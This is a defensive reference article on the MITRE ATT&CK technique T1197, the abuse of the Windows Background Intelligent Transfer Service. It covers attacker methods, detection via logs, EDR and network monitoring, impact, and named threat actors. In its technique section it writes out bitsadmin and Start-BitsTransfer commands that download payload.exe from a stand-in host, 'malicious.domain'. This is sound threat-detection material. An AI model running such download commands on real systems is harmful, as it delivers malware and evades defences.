BITS Jobs

Information

• Name: BITS Jobs

• ID: T1197

• Tactics: TA0005, TA0003

Introduction

BITS Jobs, or Background Intelligent Transfer Service jobs, is a technique categorized under the MITRE ATT&CK framework (Technique ID: T1197). BITS is a legitimate Microsoft Windows service designed to facilitate asynchronous, prioritized, and throttled file transfers between machines over HTTP/HTTPS. Attackers exploit this built-in Windows component to stealthily download, execute, or exfiltrate data, leveraging its trusted status to evade detection and blend into normal network activity.

Deep Dive Into Technique

Background Intelligent Transfer Service (BITS) is a native Windows component utilized primarily by Windows Update and other legitimate applications for transferring files in the background, ensuring minimal disruption to user experience. Attackers abuse BITS due to its native presence, trusted behavior, and ability to bypass certain firewall rules and network security measures.

Technical details and execution methods include:

• BITSAdmin Tool: Attackers commonly use the built-in command-line utility bitsadmin.exe to create and manage BITS jobs.

  • Example command to create a job:

    Copy

    bitsadmin /create maliciousJob
    bitsadmin /addfile maliciousJob http://malicious.domain/payload.exe C:\Windows\Temp\payload.exe
    bitsadmin /resume maliciousJob

  • Execution after download:

    Copy

    bitsadmin /complete maliciousJob

• PowerShell Integration: Attackers may leverage PowerShell cmdlets to manage BITS jobs silently:

  Copy

  Start-BitsTransfer -Source "http://malicious.domain/payload.exe" -Destination "C:\Temp\payload.exe"

• Persistence and Scheduled Tasks: Attackers can use BITS jobs in combination with scheduled tasks to achieve persistence, ensuring malicious payloads are regularly downloaded and executed.

• Data Exfiltration: BITS can also facilitate data exfiltration by uploading files to attacker-controlled servers over HTTP or HTTPS, blending malicious traffic with legitimate network activities.

When this Technique is Usually Used

BITS Jobs are commonly utilized by attackers across various stages and scenarios, including:

• Initial Access and Execution:

  • Delivering malicious payloads onto compromised hosts, bypassing traditional download restrictions.

  • Executing malware payloads directly after download.

• Persistence and Scheduled Execution:

  • Establishing recurring BITS jobs to maintain persistence and regularly update malicious payloads.

• Defense Evasion:

  • Using legitimate Windows services to evade detection by endpoint protection software and firewalls.

  • Leveraging trusted process execution (signed Microsoft binaries) to bypass application whitelisting.

• Command and Control (C2) Communications:

  • Utilizing BITS to periodically download instructions or payloads from attacker-controlled servers.

• Data Exfiltration:

  • Uploading sensitive data to external servers via BITS to conceal data exfiltration within legitimate traffic patterns.

How this Technique is Usually Detected

Detection of malicious BITS Jobs involves monitoring system events, network traffic, and specific indicators of compromise (IoCs):

• Event Logs and Process Monitoring:

  • Monitor Windows Event Logs (Application/System logs) for suspicious BITS job creations and completions.

  • Track usage of bitsadmin.exe and PowerShell cmdlets (Start-BitsTransfer) with unusual parameters or sources.

• Endpoint Detection and Response (EDR):

  • Use EDR solutions to detect anomalous behaviors, such as unexpected file downloads initiated by BITS.

  • Detect unusual child processes spawned by svchost.exe or bitsadmin.exe.

• Network Traffic Analysis:

  • Inspect outbound HTTP/HTTPS traffic originating from BITS processes (svchost.exe) to unusual or unknown external domains or IP addresses.

  • Detect repeated or periodic requests to suspicious URLs.

• Behavioral Indicators and IoCs:

  • Unusual BITS job names (e.g., random or suspicious naming conventions).

  • Downloads or uploads of executables or scripts from/to suspicious domains.

  • Unexpected binaries or scripts appearing in temporary directories (C:\Windows\Temp, %APPDATA%, %TEMP%).

• Tools and Techniques for Detection:

  • Sysmon (System Monitor) to log process creation, file creation, and network connections.

  • Windows Defender ATP, CrowdStrike Falcon, Carbon Black, or similar EDR platforms to detect anomalous activity.

  • Network IDS/IPS solutions to identify suspicious HTTP/HTTPS traffic patterns associated with BITS.

Why it is Important to Detect This Technique

Early detection of malicious BITS Jobs is critical due to the following potential impacts:

• Stealthy Malware Delivery and Execution:

  • Attackers can quietly deliver and execute malware, ransomware, or remote access tools, bypassing traditional antivirus and firewall protections.

• Persistence and Long-Term Compromise:

  • Undetected BITS jobs enable attackers to maintain persistent access, conduct long-term espionage, or repeatedly deliver updated malicious payloads.

• Data Exfiltration Risks:

  • Attackers may leverage BITS to exfiltrate sensitive data, such as intellectual property, personally identifiable information (PII), or credentials, causing significant financial and reputational damage.

• Defense Evasion Capability:

  • Exploiting trusted Windows services allows attackers to evade traditional security controls, making detection challenging without specialized monitoring.

• Early Stage Detection Advantage:

  • Identifying malicious BITS activity early in the attack lifecycle can prevent further lateral movement, privilege escalation, or damage within the network environment.

Examples

Real-world examples of BITS Jobs abuse in cyber-attacks include:

• APT Groups and Nation-State Actors:

  • APT29 (Cozy Bear):

    • Utilized BITS jobs to download second-stage payloads and maintain persistence within compromised environments.

    • Leveraged legitimate Windows utilities (bitsadmin.exe) to evade detection by endpoint security solutions.

  • APT41:

    • Employed BITS to download and execute payloads during targeted attacks against healthcare and technology sectors.

• Commodity Malware and Ransomware Campaigns:

  • Ryuk Ransomware:

    • Leveraged BITS jobs to download additional malicious payloads onto compromised systems, enabling lateral movement and further compromise.

  • Emotet Malware:

    • Utilized BITS to silently retrieve payload updates and modules from attacker-controlled infrastructure, evading network detection.

• Penetration Testing Tools and Frameworks:

  • Metasploit Framework:

    • Includes modules (exploit/windows/local/bits_ntlm_token_impersonation) that leverage BITS jobs for privilege escalation and payload delivery.

  • Empire Framework:

    • Offers built-in functionality to leverage BITS for payload delivery and persistence, demonstrating how attackers commonly exploit this legitimate service.

Impacts observed in these real-world scenarios include:

• Successful evasion of antivirus and endpoint protection solutions.

• Persistent long-term compromise of critical infrastructure, government entities, and private sector organizations.

• Large-scale data breaches and significant financial losses resulting from ransomware infections and data exfiltration.